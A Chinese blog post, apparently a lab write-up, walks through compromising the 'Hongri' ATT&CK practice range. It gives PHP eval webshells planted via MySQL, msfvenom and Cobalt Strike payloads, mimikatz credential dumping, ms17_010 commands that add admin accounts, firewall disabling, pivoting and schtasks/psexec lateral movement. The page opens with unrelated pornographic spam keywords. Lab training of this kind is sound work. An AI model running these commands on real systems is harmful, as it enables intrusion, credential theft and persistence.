国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

紅日ATT&CK系列靶場(chǎng)(-)簡(jiǎn)記

這篇具有很好參考價(jià)值的文章主要介紹了紅日ATT&CK系列靶場(chǎng)(-)簡(jiǎn)記。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

Step 1>》信息收集

nmap 發(fā)現(xiàn)80、 3306

nmap -T4 -O 192.168.92.100

訪問(wèn)80端口

dirsearch(御劍)掃描

發(fā)現(xiàn):/phpMyadmin

Step 2?》漏洞利用

1.弱口令

http://192.168.92.100/phpMyadmin

root/root 登錄成功

2.getshell

select @@basedir //查絕對(duì)路徑

into outfile 寫馬

select '<?php eval($_POST[cmd]);?>' into outfile 'C://絕對(duì)路徑/shell.php';

FAILED

紅日ATT&CK系列靶場(chǎng)(-)簡(jiǎn)記

?嘗試 MySQL日志馬

開(kāi)啟全局日志

SET Global_general_log='on' //開(kāi)啟

show variables like '%general%' //驗(yàn)證

set global general_log_file='絕對(duì)路徑/log.php' //設(shè)置日志文件

寫馬:

select "<?php eval($_POST['cmd']);?>"

ANTSword連接馬log.php

Step 3》yxcms漏洞

信息泄露 admin/123456

模板內(nèi)寫馬

antSword 連接成功

------------------------------

Step 4》?

msfvenom 生成馬 shell.exe

use exploit/multi/handler? #監(jiān)聽(tīng)

./shell.exe? //執(zhí)行shell.exe

提權(quán):

meterpreter>shell

whoami //為system權(quán)限

Step 5>

Cobalt strike?

建立監(jiān)聽(tīng)(beacon http)

生成 exe馬cs-> attacks->packages->win Executable->x64->cs.exe

./cs.exe

---

sleep 1 #交互時(shí)間

Step 6》密碼、信息收集

shell ipconfig

shell whoami

shell net config workstation

host->Access->Run mimikatz //獲取pass

access->Elevate #賬戶提權(quán)

Step7 》 MSF->CS?

sessions -i

exploit/windows/local/payload_inject

set session 1

CS getshell成功

sleep 1

--

Step 8》CS->MSF(監(jiān)聽(tīng)7777)

new listener->foreign http(7777)

spawn->foreign/reverse_http(7777)

---

Step 9 》

socks 通過(guò)cs將msf帶入內(nèi)網(wǎng)

host->pivoting->socks sever->1080

setg Proxies socks4:192.168.92.130:1080

---------

--msf6->setg Proxies socks4:192.168.92.130:1080

use auxiliary/scanner/smb/smb_version

show? options

set rhosts 192.168.52.0/24

set threads 64

run

內(nèi)網(wǎng)開(kāi)放445->盲猜ms17_010漏洞

Step 10》

內(nèi)網(wǎng)信息收集

CS->

systeminfo //系統(tǒng)信息,發(fā)現(xiàn)4個(gè)補(bǔ)丁

net view

---

run post/windows/gather/enum_applications //安裝軟件信息

--

socks 反向代理

run post/multi/manage/autoroute

run autoroute -p

backgroud

use auxiliary/server/socks_proxy

set version 4a

set srvhost 127.0.0.1

run

jobs

利用MSF ARP模塊掃描52網(wǎng)段

use post/windows/gather/arp_scanner

set rhost 192.168.52.0/24

set sessions 1

run

CS arp掃描

shell arp -a

----

->meterpreter->getsystem

whoami

netsh advfirewall set allprofiles state off #關(guān)閉防火墻

-

nmap vuln漏洞掃描

nmap --script-vuln 192.168.92.100

msf 輔助模塊掃描-->search ms17_010

use 3

show options

set rhost 192.168.52.143

----

CS上利用目標(biāo)機(jī)上的nmap (上傳nmap.exe)對(duì)內(nèi)網(wǎng)其他主機(jī)進(jìn)行掃描

nmap --script-vuln 192.168.52.141

open port scan

Step 11>內(nèi)網(wǎng)攻擊

msf CS聯(lián)動(dòng)

use auxiliary/admin/smb/ms17_010_command

set command net user test test123 /add

run

set command net localgroup administrators test test123 /add

run

--23端口 telnet 服務(wù)上傳漏洞,ms17_010 開(kāi)啟23端口telnet

set command sc config tlntsvr start=auto

run

set command net start telnet

run

set command netstat -an

run

--telnet連接

use auxiliary/scanner/telnet/telnet_login

set username test

set password test123

set rhost 192.168.52.138

run

----

ms08_068

socks 將 msf帶入內(nèi)網(wǎng)后利用ms08_068

use auxiliary/scanner/smb/smb_version

search ms08_067

use 0

run

SMB 遠(yuǎn)程桌面密碼猜測(cè):

use exploit/multi/handler

search smb_login

use 0

set rhosts 192.168.52.141

set smbpass test@123

set smbdomain god

set smbuser administrator

run

橫向移動(dòng)-----

msf-CS聯(lián)動(dòng),在win7上連接C盤

meterpreter->shell

net use \\192.168.52.138\c$ 'test123' /user:"administrator"

dir \\192.168.52.138

copy c:\phpstudy\www\shell.exe \\192.168.52.138\c$

schtasks /create /tn "godunt" /tr C:\shell.exe /sc once /st 12:45 /S 192.168.52.138 /RU System /u administrator /p "test123"

---

CS->psexec 模塊進(jìn)行橫向移動(dòng)

new listener->becon SMB->save

host->jump->psexec->

administrator

test123

god.org

beacon smb

administrator * via 192.168.92.100@3756

lunch文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-493393.html

到了這里,關(guān)于紅日ATT&CK系列靶場(chǎng)(-)簡(jiǎn)記的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • ATT&CK v12版本戰(zhàn)術(shù)實(shí)戰(zhàn)研究—持久化(二)

    ATT&CK v12版本戰(zhàn)術(shù)實(shí)戰(zhàn)研究—持久化(二)

    前幾期文章中,我們介紹了ATTCK中偵察、資源開(kāi)發(fā)、初始訪問(wèn)、執(zhí)行戰(zhàn)術(shù)、持久化戰(zhàn)術(shù)的知識(shí)。那么從前文中介紹的相關(guān)持久化子技術(shù)來(lái)開(kāi)展測(cè)試,進(jìn)行更深一步的分析。本文主要內(nèi)容是介紹攻擊者在運(yùn)用持久化子技術(shù)時(shí),在相關(guān)的資產(chǎn)服務(wù)器或者在PC機(jī)器上所產(chǎn)生的特征數(shù)據(jù)

    2024年02月03日
    瀏覽(21)
  • 【紅藍(lán)攻防鴻篇巨著】ATT&CK視角下的紅藍(lán)對(duì)抗實(shí)戰(zhàn)指南

    【紅藍(lán)攻防鴻篇巨著】ATT&CK視角下的紅藍(lán)對(duì)抗實(shí)戰(zhàn)指南

    【文末送書(shū)】今天推薦一本網(wǎng)安領(lǐng)域優(yōu)質(zhì)書(shū)籍《ATTCK視角下的紅藍(lán)對(duì)抗實(shí)戰(zhàn)指南》,本文將從其亮點(diǎn)與內(nèi)容出發(fā),詳細(xì)闡發(fā)其對(duì)于網(wǎng)安從業(yè)人員的重要性與益處。 根據(jù)中國(guó)互聯(lián)網(wǎng)絡(luò)信息中心(CNNIC)發(fā)布的第51次《中國(guó)互聯(lián)網(wǎng)絡(luò)發(fā)展?fàn)顩r統(tǒng)計(jì)報(bào)告》,截至2022年12月,我國(guó)網(wǎng)民規(guī)

    2024年02月07日
    瀏覽(25)
  • ToBeWritten之基于ATT&CK的模擬攻擊:閉環(huán)的防御與安全運(yùn)營(yíng)

    ToBeWritten之基于ATT&CK的模擬攻擊:閉環(huán)的防御與安全運(yùn)營(yíng)

    也許每個(gè)人出生的時(shí)候都以為這世界都是為他一個(gè)人而存在的,當(dāng)他發(fā)現(xiàn)自己錯(cuò)的時(shí)候,他便開(kāi)始長(zhǎng)大 少走了彎路,也就錯(cuò)過(guò)了風(fēng)景,無(wú)論如何,感謝經(jīng)歷 轉(zhuǎn)移發(fā)布平臺(tái)通知:將不再在CSDN博客發(fā)布新文章,敬請(qǐng)移步知識(shí)星球 感謝大家一直以來(lái)對(duì)我CSDN博客的關(guān)注和支持,但

    2024年02月09日
    瀏覽(27)
  • ATT&CK覆蓋度97.1%!360終端安全管理系統(tǒng)獲賽可達(dá)認(rèn)證

    ATT&CK覆蓋度97.1%!360終端安全管理系統(tǒng)獲賽可達(dá)認(rèn)證

    近日,國(guó)際知名第三方網(wǎng)絡(luò)安全檢測(cè)服務(wù)機(jī)構(gòu)——賽可達(dá)實(shí)驗(yàn)室(SKD Labs)發(fā)布最新測(cè)試報(bào)告,360終端安全管理系統(tǒng)以ATTCK V12框架攻擊技術(shù)覆蓋面377個(gè)、覆蓋度97.1%,勒索病毒、挖礦病毒檢出率100%,誤報(bào)率0%的突出戰(zhàn)績(jī),占據(jù)行業(yè)同類產(chǎn)品領(lǐng)軍地位,順利通過(guò)賽可達(dá)實(shí)驗(yàn)室資產(chǎn)

    2024年02月12日
    瀏覽(22)
  • [系統(tǒng)安全] 四十六.惡意軟件分析 (2)靜態(tài)分析Capa經(jīng)典工具批量提取靜態(tài)特征和ATT&CK技戰(zhàn)術(shù)

    [系統(tǒng)安全] 四十六.惡意軟件分析 (2)靜態(tài)分析Capa經(jīng)典工具批量提取靜態(tài)特征和ATT&CK技戰(zhàn)術(shù)

    終于忙完初稿,開(kāi)心地寫一篇博客。 您可能之前看到過(guò)我寫的類似文章,為什么還要重復(fù)撰寫呢?只是想更好地幫助初學(xué)者了解病毒逆向分析和系統(tǒng)安全,更加成體系且不破壞之前的系列。因此,我重新開(kāi)設(shè)了這個(gè)專欄,準(zhǔn)備系統(tǒng)整理和深入學(xué)習(xí)系統(tǒng)安全、逆向分析和惡意代

    2024年02月11日
    瀏覽(23)
  • 紅日靶場(chǎng)四

    紅日靶場(chǎng)四

    目錄 環(huán)境搭建 環(huán)境說(shuō)明 官方描述 外網(wǎng)信息收集與利用 struts2漏洞 Tomcat漏洞 ?docker逃逸 提權(quán)? 內(nèi)網(wǎng)滲透 掃描內(nèi)網(wǎng)主機(jī)端口 端口轉(zhuǎn)發(fā) 利用永恒之藍(lán)獲得win7? mimikatz抓取密碼? 域橫向移動(dòng) 利用Kerberos 域用戶提權(quán)漏洞獲得域控WIN2008 上傳msf馬到域控? ?mimikatz抓取密碼 遠(yuǎn)程登陸域

    2024年02月03日
    瀏覽(21)
  • 紅日靶場(chǎng)5

    紅日靶場(chǎng)5

    目錄 前言 外網(wǎng)滲透 信息收集 1、arp探測(cè) 2、nmap 3、nikto 4、whatweb 5、gobuster 6、dirsearch 漏洞探測(cè) ThinKPHP漏洞 漏洞利用 get shell 內(nèi)網(wǎng)滲透 信息收集 CS 啟動(dòng)! CS連接 CS信息收集 1、hashdump 2、獼猴桃 3、端口掃描 MSF啟動(dòng)! MSF木馬生成 MSF監(jiān)聽(tīng)模塊 MSF信息收集 1、添加內(nèi)網(wǎng)路由 2、引入

    2024年01月16日
    瀏覽(18)
  • 紅日靶場(chǎng)1

    紅日靶場(chǎng)1

    靶場(chǎng)環(huán)境搭建 機(jī)器名稱 外網(wǎng)IP(模擬外網(wǎng)) 內(nèi)網(wǎng)IP(模擬內(nèi)網(wǎng)) 攻擊機(jī)器 192.168.142.133 Win7機(jī)器 192.168.142.210 192.168.140.210 Win Server 2008機(jī)器(DC) 192.168.140.220 Win Server 2003機(jī)器 192.168.140.230 坑點(diǎn) (1)在Win7機(jī)器上打開(kāi)phpstudy時(shí),第一次會(huì)出現(xiàn)報(bào)錯(cuò),需要重啟一下Win7機(jī)器。 1、通過(guò)

    2024年02月08日
    瀏覽(24)
  • 紅日靶場(chǎng)2

    紅日靶場(chǎng)2

    1、初始密碼為1qaz@WSX,注意WEB這臺(tái)機(jī)器,需要切換用戶為de1ay,密碼為1qaz@WSX登入 2、修改網(wǎng)卡,如PC 、WEB 擁有倆個(gè)網(wǎng)卡,則網(wǎng)卡一設(shè)置為nat,也可以是主機(jī)模式,但由于學(xué)校校園網(wǎng)認(rèn)證方面的問(wèn)題,主機(jī)模式無(wú)法上網(wǎng),所以我用nat模式。對(duì)應(yīng)的把nat模式的網(wǎng)段修改為192.168.

    2023年04月16日
    瀏覽(20)
  • 紅日內(nèi)網(wǎng)滲透靶場(chǎng)2

    紅日內(nèi)網(wǎng)滲透靶場(chǎng)2

    目錄 ? 環(huán)境搭建: Web滲透: weblogic漏洞利用 java反序列化漏洞利用、哥斯拉獲取shell 上線msf msf派生shell到cs 內(nèi)網(wǎng)信息收集 mimikatz獲取用戶密碼 cs橫向移動(dòng) PTT攻擊(票據(jù)傳遞) 方法2:通過(guò)msf利用永恒之藍(lán)以及3389端口 上線cs cs派生shell給msf fscan掃描內(nèi)網(wǎng) frp搭建socks5隧道代理 永

    2024年01月21日
    瀏覽(22)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包